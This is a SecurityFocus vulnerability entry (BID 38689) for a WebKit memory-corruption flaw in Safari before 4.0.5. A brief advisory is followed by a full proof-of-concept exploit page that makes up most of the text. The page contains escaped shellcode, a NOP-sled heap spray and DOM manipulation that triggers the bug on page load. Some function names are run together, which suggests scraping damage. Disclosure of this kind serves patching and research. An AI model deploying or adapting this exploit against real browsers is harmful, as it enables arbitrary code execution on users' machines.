source: https://www.securityfocus.com/bid/38689/info
WebKit is prone to a remote memory-corruption vulnerability; fixes are available.
Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
This issue was previously documented in BID 38671(Apple Safari Prior to 4.0.5 Multiple Security Vulnerabilities) but has been given its own record to better document it.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"><HTML lang="en"><HEAD><script type="text/javascript">//<![CDATA[functionfuzz_load(){ spray2();e=document.getElementsByTagName("FORM")[0];e.previousSibling.dir="rtl"; //e.previousSibling.style="font-size:111px;"; setTimeout('fuzz_timer_0();',1);}functionspray2(){ var shellcode ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1"; var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");do{ spray += spray;} while(spray.length < 0xc0000); memory = new Array(); for(i =0; i <50; i++) memory[i]= spray + shellcode;}functioncalc(){ var s0 ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1"; var addr1= unescape("%u9090%u9090"); var addr2="\uc5c6\uc7c9"; var addr3="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr4="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr5="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr6="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051";}functionfuzz_timer_0(){e=document.getElementsByTagName("NOBR")[0];e.innerHTML=''; calc(); document.lastChild.normalize();} //]]></script><code>1111<AREA>13333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333<FORM ><NOBR /><BIG /></FORM></AREA></code></A></HEAD><BODY dir="rtl"onload="fuzz_load();"></BODY></HTML>
